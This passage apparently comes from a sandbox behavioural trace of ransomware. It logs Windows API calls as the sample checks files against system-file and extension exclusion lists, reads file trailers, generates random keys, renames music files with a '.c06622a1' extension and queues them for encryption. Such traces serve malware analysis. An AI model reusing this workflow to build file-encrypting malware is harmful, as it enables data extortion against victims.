(_Str1="bat", _Str2="m4a") returned -11 [0160.274] wcslen (_String="bat") returned 0x3 [0160.274] _wcsicmp (_Str1="bin", _Str2="m4a") returned -11 [0160.274] wcslen (_String="bin") returned 0x3 [0160.274] _wcsicmp (_Str1="cab", _Str2="m4a") returned -10 [0160.274] wcslen (_String="cab") returned 0x3 [0160.274] _wcsicmp (_Str1="cmd", _Str2="m4a") returned -10 [0160.274] wcslen (_String="cmd") returned 0x3 [0160.274] _wcsicmp (_Str1="com", _Str2="m4a") returned -10 [0160.274] wcslen (_String="com") returned 0x3 [0160.274] _wcsicmp (_Str1="cpl", _Str2="m4a") returned -10 [0160.275] wcslen (_String="cpl") returned 0x3 [0160.275] _wcsicmp (_Str1="cur", _Str2="m4a") returned -10 [0160.275] wcslen (_String="cur") returned 0x3 [0160.275] _wcsicmp (_Str1="deskthemepack", _Str2="m4a") returned -9 [0160.275] wcslen (_String="deskthemepack") returned 0xd [0160.275] _wcsicmp (_Str1="diagcab", _Str2="m4a") returned -9 [0160.275] wcslen (_String="diagcab") returned 0x7 [0160.275] _wcsicmp (_Str1="diagcfg", _Str2="m4a") returned -9 [0160.275] wcslen (_String="diagcfg") returned 0x7 [0160.275] _wcsicmp (_Str1="diagpkg", _Str2="m4a") returned -9 [0160.275] wcslen (_String="diagpkg") returned 0x7 [0160.275] _wcsicmp (_Str1="dll", _Str2="m4a") returned -9 [0160.275] wcslen (_String="dll") returned 0x3 [0160.275] _wcsicmp (_Str1="drv", _Str2="m4a") returned -9 [0160.275] wcslen (_String="drv") returned 0x3 [0160.275] _wcsicmp (_Str1="exe", _Str2="m4a") returned -8 [0160.275] wcslen (_String="exe") returned 0x3 [0160.275] _wcsicmp (_Str1="hlp", _Str2="m4a") returned -5 [0160.275] wcslen (_String="hlp") returned 0x3 [0160.275] _wcsicmp (_Str1="icl", _Str2="m4a") returned -4 [0160.275] wcslen (_String="icl") returned 0x3 [0160.275] _wcsicmp (_Str1="icns", _Str2="m4a") returned -4 [0160.275] wcslen (_String="icns") returned 0x4 [0160.275] _wcsicmp (_Str1="ico", _Str2="m4a") returned -4 [0160.275] wcslen (_String="ico") returned 0x3 [0160.275] _wcsicmp (_Str1="ics", _Str2="m4a") returned -4 [0160.276] wcslen (_String="ics") returned 0x3 [0160.276] _wcsicmp (_Str1="idx", _Str2="m4a") returned -4 [0160.276] wcslen (_String="idx") returned 0x3 [0160.276] _wcsicmp (_Str1="ldf", _Str2="m4a") returned -1 [0160.276] wcslen (_String="ldf") returned 0x3 [0160.276] _wcsicmp (_Str1="lnk", _Str2="m4a") returned -1 [0160.276] wcslen (_String="lnk") returned 0x3 [0160.276] _wcsicmp (_Str1="mod", _Str2="m4a") returned 59 [0160.276] wcslen (_String="mod") returned 0x3 [0160.276] _wcsicmp (_Str1="mpa", _Str2="m4a") returned 60 [0160.276] wcslen (_String="mpa") returned 0x3 [0160.276] _wcsicmp (_Str1="msc", _Str2="m4a") returned 63 [0160.276] wcslen (_String="msc") returned 0x3 [0160.276] _wcsicmp (_Str1="msp", _Str2="m4a") returned 63 [0160.276] wcslen (_String="msp") returned 0x3 [0160.276] _wcsicmp (_Str1="msstyles", _Str2="m4a") returned 63 [0160.276] wcslen (_String="msstyles") returned 0x8 [0160.276] _wcsicmp (_Str1="msu", _Str2="m4a") returned 63 [0160.276] wcslen (_String="msu") returned 0x3 [0160.276] _wcsicmp (_Str1="nls", _Str2="m4a") returned 1 [0160.276] wcslen (_String="nls") returned 0x3 [0160.276] _wcsicmp (_Str1="nomedia", _Str2="m4a") returned 1 [0160.276] wcslen (_String="nomedia") returned 0x7 [0160.276] _wcsicmp (_Str1="ocx", _Str2="m4a") returned 2 [0160.276] wcslen (_String="ocx") returned 0x3 [0160.277] _wcsicmp (_Str1="prf", _Str2="m4a") returned 3 [0160.277] wcslen (_String="prf") returned 0x3 [0160.277] _wcsicmp (_Str1="ps1", _Str2="m4a") returned 3 [0160.277] wcslen (_String="ps1") returned 0x3 [0160.277] _wcsicmp (_Str1="rom", _Str2="m4a") returned 5 [0160.277] wcslen (_String="rom") returned 0x3 [0160.277] _wcsicmp (_Str1="rtp", _Str2="m4a") returned 5 [0160.277] wcslen (_String="rtp") returned 0x3 [0160.277] _wcsicmp (_Str1="scr", _Str2="m4a") returned 6 [0160.277] wcslen (_String="scr") returned 0x3 [0160.277] _wcsicmp (_Str1="shs", _Str2="m4a") returned 6 [0160.277] wcslen (_String="shs") returned 0x3 [0160.277] _wcsicmp (_Str1="spl", _Str2="m4a") returned 6 [0160.277] wcslen (_String="spl") returned 0x3 [0160.277] _wcsicmp (_Str1="sys", _Str2="m4a") returned 6 [0160.277] wcslen (_String="sys") returned 0x3 [0160.277] _wcsicmp (_Str1="theme", _Str2="m4a") returned 7 [0160.277] wcslen (_String="theme") returned 0x5 [0160.277] _wcsicmp (_Str1="themepack", _Str2="m4a") returned 7 [0160.277] wcslen (_String="themepack") returned 0x9 [0160.277] _wcsicmp (_Str1="wpx", _Str2="m4a") returned 10 [0160.277] wcslen (_String="wpx") returned 0x3 [0160.277] _wcsicmp (_Str1="lock", _Str2="m4a") returned -1 [0160.277] wcslen (_String="lock") returned 0x4 [0160.277] _wcsicmp (_Str1="key", _Str2="m4a") returned -2 [0160.277] wcslen (_String="key") returned 0x3 [0160.277] _wcsicmp (_Str1="hta", _Str2="m4a") returned -5 [0160.278] wcslen (_String="hta") returned 0x3 [0160.278] _wcsicmp (_Str1="msi", _Str2="m4a") returned 63 [0160.278] wcslen (_String="msi") returned 0x3 [0160.278] _wcsicmp (_Str1="pdb", _Str2="m4a") returned 3 [0160.278] wcslen (_String="pdb") returned 0x3 [0160.278] _wcsicmp (_Str1="sqlite", _Str2="m4a") returned 6 [0160.278] wcslen (_String="sqlite") returned 0x6 [0160.278] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\lnixwvzg3uhvd9kw d q")) returned 0x10 [0160.278] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3272078 [0160.278] wcscpy (in: _Dest=0x3272078, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q" [0160.278] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q") returned 0x43 [0160.278] wcscpy (in: _Dest=0x3272100, _Source="PS5Jm19.m4a" | out: _Dest="PS5Jm19.m4a") returned="PS5Jm19.m4a" [0160.278] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q\\PS5Jm19.m4a", dwFileAttributes=0x80) returned 1 [0160.278] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q\\PS5Jm19.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\lnixwvzg3uhvd9kw d q\\ps5jm19.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0160.279] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0160.279] ReadFile (in: hFile=0x198, lpBuffer=0x32e724, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32e7b4, lpOverlapped=0x0 | out: lpBuffer=0x32e724*, lpNumberOfBytesRead=0x32e7b4*=0x90, lpOverlapped=0x0) returned 1 [0160.279] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32e724, Length=0x80) returned 0x875a4f95 [0160.279] RtlComputeCrc32 (PartialCrc=0x4f95, Buffer=0x32e724, Length=0x80) returned 0x66a99e30 [0160.279] RtlComputeCrc32 (PartialCrc=0x9e30, Buffer=0x32e724, Length=0x80) returned 0x6ae7a8a7 [0160.279] RtlComputeCrc32 (PartialCrc=0xa8a7, Buffer=0x32e724, Length=0x80) returned 0x3eb0b088 [0160.280] RtlComputeCrc32 (PartialCrc=0xb088, Buffer=0x32e724, Length=0x80) returned 0x28d9b51c [0160.280] CloseHandle (hObject=0x198) returned 1 [0160.280] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3282080 [0160.280] wcscpy (in: _Dest=0x3282080, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q\\PS5Jm19.m4a" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q\\PS5Jm19.m4a") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q\\PS5Jm19.m4a" [0160.280] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q\\PS5Jm19.m4a") returned 0x4f [0160.280] wcscpy (in: _Dest=0x328211e, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0160.280] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q\\PS5Jm19.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\lnixwvzg3uhvd9kw d q\\ps5jm19.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q\\PS5Jm19.m4a.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\lnixwvzg3uhvd9kw d q\\ps5jm19.m4a.c06622a1"), dwFlags=0x8) returned 1 [0160.282] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q\\PS5Jm19.m4a.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\lnixwvzg3uhvd9kw d q\\ps5jm19.m4a.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x198 [0160.282] CreateIoCompletionPort (FileHandle=0x198, ExistingCompletionPort=0xd8, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0xd8 [0160.282] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x3ab0020 [0160.290] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x7f546619 [0160.290] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x4894d7f1 [0160.290] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x36c72fd2 [0160.290] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x7e96a135 [0160.290] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x7eeab543 [0160.290] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x39849149 [0160.290] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x77f61d16 [0160.290] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0xfd73b36 [0160.293] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3ab0094, Length=0x80) returned 0xa83e1cca [0160.293] RtlComputeCrc32 (PartialCrc=0x1cca, Buffer=0x3ab0094, Length=0x80) returned 0x1f9af7a1 [0160.293] RtlComputeCrc32 (PartialCrc=0xf7a1, Buffer=0x3ab0094, Length=0x80) returned 0x9b49d962 [0160.294] RtlComputeCrc32 (PartialCrc=0xd962, Buffer=0x3ab0094, Length=0x80) returned 0x18c8c30b [0160.294] RtlComputeCrc32 (PartialCrc=0xc30b, Buffer=0x3ab0094, Length=0x80) returned 0xf9557f3a [0160.294] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3ab0020) returned 1 [0160.294] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3272078) returned 1 [0160.295] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3282080) returned 1 [0160.296] FindNextFileW (in: hFindFile=0x1541c8, lpFindFileData=0x32e89c | out: lpFindFileData=0x32e89c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb274f1e0, ftCreationTime.dwHighDateTime=0x1d5def5, ftLastAccessTime.dwLowDateTime=0xf726f5f0, ftLastAccessTime.dwHighDateTime=0x1d5dcd8, ftLastWriteTime.dwLowDateTime=0xf726f5f0, ftLastWriteTime.dwHighDateTime=0x1d5dcd8, nFileSizeHigh=0x0, nFileSizeLow=0x584a, dwReserved0=0x0, dwReserved1=0x0, cFileName="raTDxN8y7Q7vywp.m4a", cAlternateFileName="RATDXN~1.M4A")) returned 1 [0160.296] _wcsicmp (_Str1="raTDxN8y7Q7vywp.m4a", _Str2="README.c06622a1.TXT") returned -4 [0160.296] wcsstr (_Str="raTDxN8y7Q7vywp.m4a", _SubStr="README") returned 0x0 [0160.296] _wcsicmp (_Str1="autorun.inf", _Str2="raTDxN8y7Q7vywp.m4a") returned -17 [0160.296] wcslen (_String="autorun.inf") returned 0xb [0160.296] _wcsicmp (_Str1="boot.ini", _Str2="raTDxN8y7Q7vywp.m4a") returned -16 [0160.296] wcslen (_String="boot.ini") returned 0x8 [0160.296] _wcsicmp (_Str1="bootfont.bin", _Str2="raTDxN8y7Q7vywp.m4a") returned -16 [0160.296] wcslen (_String="bootfont.bin") returned 0xc [0160.296] _wcsicmp (_Str1="bootsect.bak", _Str2="raTDxN8y7Q7vywp.m4a") returned -16 [0160.296] wcslen (_String="bootsect.bak") returned 0xc [0160.296] _wcsicmp (_Str1="desktop.ini", _Str2="raTDxN8y7Q7vywp.m4a") returned -14 [0160.296] wcslen (_String="desktop.ini") returned 0xb [0160.296] _wcsicmp (_Str1="iconcache.db", _Str2="raTDxN8y7Q7vywp.m4a") returned -9 [0160.296] wcslen (_String="iconcache.db") returned 0xc [0160.296] _wcsicmp (_Str1="ntldr", _Str2="raTDxN8y7Q7vywp.m4a") returned -4 [0160.296] wcslen (_String="ntldr") returned 0x5 [0160.297] _wcsicmp (_Str1="ntuser.dat", _Str2="raTDxN8y7Q7vywp.m4a") returned -4 [0160.297] wcslen (_String="ntuser.dat") returned 0xa [0160.297] _wcsicmp (_Str1="ntuser.dat.log", _Str2="raTDxN8y7Q7vywp.m4a") returned -4 [0160.297] wcslen (_String="ntuser.dat.log") returned 0xe [0160.297] _wcsicmp (_Str1="ntuser.ini", _Str2="raTDxN8y7Q7vywp.m4a") returned -4 [0160.297] wcslen (_String="ntuser.ini") returned 0xa [0160.297] _wcsicmp (_Str1="thumbs.db", _Str2="raTDxN8y7Q7vywp.m4a") returned 2 [0160.297] wcslen (_String="thumbs.db") returned 0x9 [0160.297] _wcsicmp (_Str1="386", _Str2="m4a") returned -58 [0160.297] wcslen (_String="386") returned 0x3 [0160.297] _wcsicmp (_Str1="adv", _Str2="m4a") returned -12 [0160.297] wcslen (_String="adv") returned 0x3 [0160.297] _wcsicmp (_Str1="ani", _Str2="m4a") returned -12 [0160.297] wcslen (_String="ani") returned 0x3 [0160.297] _wcsicmp (_Str1="bat", _Str2="m4a") returned -11 [0160.297] wcslen (_String="bat") returned 0x3 [0160.297] _wcsicmp (_Str1="bin", _Str2="m4a") returned -11 [0160.297] wcslen (_String="bin") returned 0x3 [0160.297] _wcsicmp (_Str1="cab", _Str2="m4a") returned -10 [0160.297] wcslen (_String="cab") returned 0x3 [0160.297] _wcsicmp (_Str1="cmd", _Str2="m4a") returned -10 [0160.297] wcslen (_String="cmd") returned 0x3 [0160.297] _wcsicmp (_Str1="com", _Str2="m4a") returned -10 [0160.297] wcslen (_String="com") returned 0x3 [0160.298] _wcsicmp (_Str1="cpl", _Str2="m4a") returned -10 [0160.298] wcslen (_String="cpl") returned 0x3 [0160.298] _wcsicmp (_Str1="cur", _Str2="m4a") returned -10 [0160.298] wcslen (_String="cur") returned 0x3 [0160.298] _wcsicmp (_Str1="deskthemepack", _Str2="m4a") returned -9 [0160.298] wcslen (_String="deskthemepack") returned 0xd [0160.298] _wcsicmp (_Str1="diagcab", _Str2="m4a") returned -9 [0160.298] wcslen (_String="diagcab") returned 0x7 [0160.298] _wcsicmp (_Str1="diagcfg", _Str2="m4a") returned -9 [0160.298] wcslen (_String="diagcfg") returned 0x7 [0160.298] _wcsicmp (_Str1="diagpkg", _Str2="m4a") returned -9 [0160.298] wcslen (_String="diagpkg") returned 0x7 [0160.298] _wcsicmp (_Str1="dll", _Str2="m4a") returned -9 [0160.298] wcslen (_String="dll") returned 0x3 [0160.298] _wcsicmp (_Str1="drv", _Str2="m4a") returned -9 [0160.298] wcslen (_String="drv") returned 0x3 [0160.298] _wcsicmp (_Str1="exe", _Str2="m4a") returned -8 [0160.298] wcslen (_String="exe") returned 0x3 [0160.298] _wcsicmp (_Str1="hlp", _Str2="m4a") returned -5 [0160.298] wcslen (_String="hlp") returned 0x3 [0160.298] _wcsicmp (_Str1="icl", _Str2="m4a") returned -4 [0160.298] wcslen (_String="icl") returned 0x3 [0160.298] _wcsicmp (_Str1="icns", _Str2="m4a") returned -4 [0160.299] wcslen (_String="icns") returned 0x4 [0160.299] _wcsicmp (_Str1="ico", _Str2="m4a") returned -4 [0160.299] wcslen (_String="ico") returned 0x3 [0160.299] _wcsicmp (_Str1="ics", _Str2="m4a") returned -4 [0160.299] wcslen (_String="ics") returned 0x3 [0160.299] _wcsicmp (_Str1="idx", _Str2="m4a") returned -4 [0160.299] wcslen (_String="idx") returned 0x3 [0160.299] _wcsicmp (_Str1="ldf", _Str2="m4a") returned -1 [0160.299] wcslen (_String="ldf") returned 0x3 [0160.299] _wcsicmp (_Str1="lnk", _Str2="m4a") returned -1 [0160.299] wcslen (_String="lnk") returned 0x3 [0160.299] _wcsicmp (_Str1="mod", _Str2="m4a") returned 59 [0160.299] wcslen (_String="mod") returned 0x3 [0160.299] _wcsicmp (_Str1="mpa", _Str2="m4a") returned 60 [0160.299] wcslen (_String="mpa") returned 0x3 [0160.299] _wcsicmp (_Str1="msc", _Str2="m4a") returned 63 [0160.299] wcslen (_String="msc") returned 0x3 [0160.299] _wcsicmp (_Str1="msp", _Str2="m4a") returned 63 [0160.299] wcslen (_String="msp") returned 0x3 [0160.299] _wcsicmp (_Str1="msstyles", _Str2="m4a") returned 63 [0160.299] wcslen (_String="msstyles") returned 0x8 [0160.299] _wcsicmp (_Str1="msu", _Str2="m4a") returned 63 [0160.299] wcslen (_String="msu") returned 0x3 [0160.299] _wcsicmp (_Str1="nls", _Str2="m4a") returned 1 [0160.299] wcslen (_String="nls") returned 0x3 [0160.300] _wcsicmp (_Str1="nomedia", _Str2="m4a") returned 1 [0160.300] wcslen (_String="nomedia") returned 0x7 [0160.300] _wcsicmp (_Str1="ocx", _Str2="m4a") returned 2 [0160.300] wcslen (_String="ocx") returned 0x3 [0160.300] _wcsicmp (_Str1="prf", _Str2="m4a") returned 3 [0160.300] wcslen (_String="prf") returned 0x3 [0160.300] _wcsicmp (_Str1="ps1", _Str2="m4a") returned 3 [0160.300] wcslen (_String="ps1") returned 0x3 [0160.300] _wcsicmp (_Str1="rom", _Str2="m4a") returned 5 [0160.300] wcslen (_String="rom") returned 0x3 [0160.300] _wcsicmp (_Str1="rtp", _Str2="m4a") returned 5 [0160.300] wcslen (_String="rtp") returned 0x3 [0160.300] _wcsicmp (_Str1="scr", _Str2="m4a") returned 6 [0160.300] wcslen (_String="scr") returned 0x3 [0160.300] _wcsicmp (_Str1="shs", _Str2="m4a") returned 6 [0160.300] wcslen (_String="shs") returned 0x3 [0160.300] _wcsicmp (_Str1="spl", _Str2="m4a") returned 6 [0160.300] wcslen (_String="spl") returned 0x3 [0160.300] _wcsicmp (_Str1="sys", _Str2="m4a") returned 6 [0160.300] wcslen (_String="sys") returned 0x3 [0160.300] _wcsicmp (_Str1="theme", _Str2="m4a") returned 7 [0160.300] wcslen (_String="theme") returned 0x5 [0160.300] _wcsicmp (_Str1="themepack", _Str2="m4a") returned 7 [0160.300] wcslen (_String="themepack") returned 0x9 [0160.300] _wcsicmp (_Str1="wpx", _Str2="m4a") returned 10 [0160.301] wcslen (_String="wpx") returned 0x3 [0160.301] _wcsicmp (_Str1="lock", _Str2="m4a") returned -1 [0160.301] wcslen (_String="lock") returned 0x4 [0160.301] _wcsicmp (_Str1="key", _Str2="m4a") returned -2 [0160.301] wcslen (_String="key") returned 0x3 [0160.301] _wcsicmp (_Str1="hta", _Str2="m4a") returned -5 [0160.301] wcslen (_String="hta") returned 0x3 [0160.301] _wcsicmp (_Str1="msi", _Str2="m4a") returned 63 [0160.301] wcslen (_String="msi") returned 0x3 [0160.301] _wcsicmp (_Str1="pdb", _Str2="m4a") returned 3 [0160.301] wcslen (_String="pdb") returned 0x3 [0160.301] _wcsicmp (_Str1="sqlite", _Str2="m4a") returned 6 [0160.301] wcslen (_String="sqlite") returned 0x6 [0160.301] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\lnixwvzg3uhvd9kw d q")) returned 0x10 [0160.301] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3272078 [0160.301] wcscpy (in: _Dest=0x3272078, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q" [0160.301] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q") returned 0x43 [0160.301] wcscpy (in: _Dest=0x3272100, _Source="raTDxN8y7Q7vywp.m4a" | out: _Dest="raTDxN8y7Q7vywp.m4a") returned="raTDxN8y7Q7vywp.m4a" [0160.301] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q\\raTDxN8y7Q7vywp.m4a", dwFileAttributes=0x80) returned 1 [0160.302] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q\\raTDxN8y7Q7vywp.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\lnixwvzg3uhvd9kw d q\\ratdxn8y7q7vywp.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0160.302] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0160.302] ReadFile (in: hFile=0x194, lpBuffer=0x32e724, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32e7b4, lpOverlapped=0x0 | out: lpBuffer=0x32e724*, lpNumberOfBytesRead=0x32e7b4*=0x90, lpOverlapped=0x0) returned 1 [0160.303] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32e724, Length=0x80) returned 0xa575e44a [0160.303] RtlComputeCrc32 (PartialCrc=0xe44a, Buffer=0x32e724, Length=0x80) returned 0xbc6528c8 [0160.303] RtlComputeCrc32 (PartialCrc=0x28c8, Buffer=0x32e724, Length=0x80) returned 0xef905d9c [0160.303] RtlComputeCrc32 (PartialCrc=0x5d9c, Buffer=0x32e724, Length=0x80) returned 0x9b2804f [0160.303] RtlComputeCrc32 (PartialCrc=0x804f, Buffer=0x32e724, Length=0x80) returned 0xe29bf3e9 [0160.303] CloseHandle (hObject=0x194) returned 1 [0160.303] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3282080 [0160.303] wcscpy (in: _Dest=0x3282080, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q\\raTDxN8y7Q7vywp.m4a" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q\\raTDxN8y7Q7vywp.m4a") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q\\raTDxN8y7Q7vywp.m4a" [0160.303] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q\\raTDxN8y7Q7vywp.m4a") returned 0x57 [0160.303] wcscpy (in: _Dest=0x328212e, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0160.303] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q\\raTDxN8y7Q7vywp.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\lnixwvzg3uhvd9kw d q\\ratdxn8y7q7vywp.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q\\raTDxN8y7Q7vywp.m4a.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\lnixwvzg3uhvd9kw d q\\ratdxn8y7q7vywp.m4a.c06622a1"), dwFlags=0x8) returned 1 [0160.306] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q\\raTDxN8y7Q7vywp.m4a.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\lnixwvzg3uhvd9kw d q\\ratdxn8y7q7vywp.m4a.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x194 [0160.306] CreateIoCompletionPort (FileHandle=0x194, ExistingCompletionPort=0x130, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x130 [0160.306] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x3b40020 [0160.314] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x27676a1a [0160.314] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x73b9e2d6 [0160.314] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x22fa684f [0160.314] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x664e3bb5 [0160.314] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x76d72bd [0160.314] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x21390582 [0160.314] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x798f7d07 [0160.314] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x360410f9 [0160.317] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3b40094, Length=0x80) returned 0x46955083 [0160.317] RtlComputeCrc32 (PartialCrc=0x5083, Buffer=0x3b40094, Length=0x80) returned 0x14138bda [0160.317] RtlComputeCrc32 (PartialCrc=0x8bda, Buffer=0x3b40094, Length=0x80) returned 0x3ea3e489 [0160.318] RtlComputeCrc32 (PartialCrc=0xe489, Buffer=0x3b40094, Length=0x80) returned 0x38bb2bea [0160.318] RtlComputeCrc32 (PartialCrc=0x2bea, Buffer=0x3b40094, Length=0x80) returned 0xf3e97b1e [0160.318] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3b40020) returned 1 [0160.318] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, 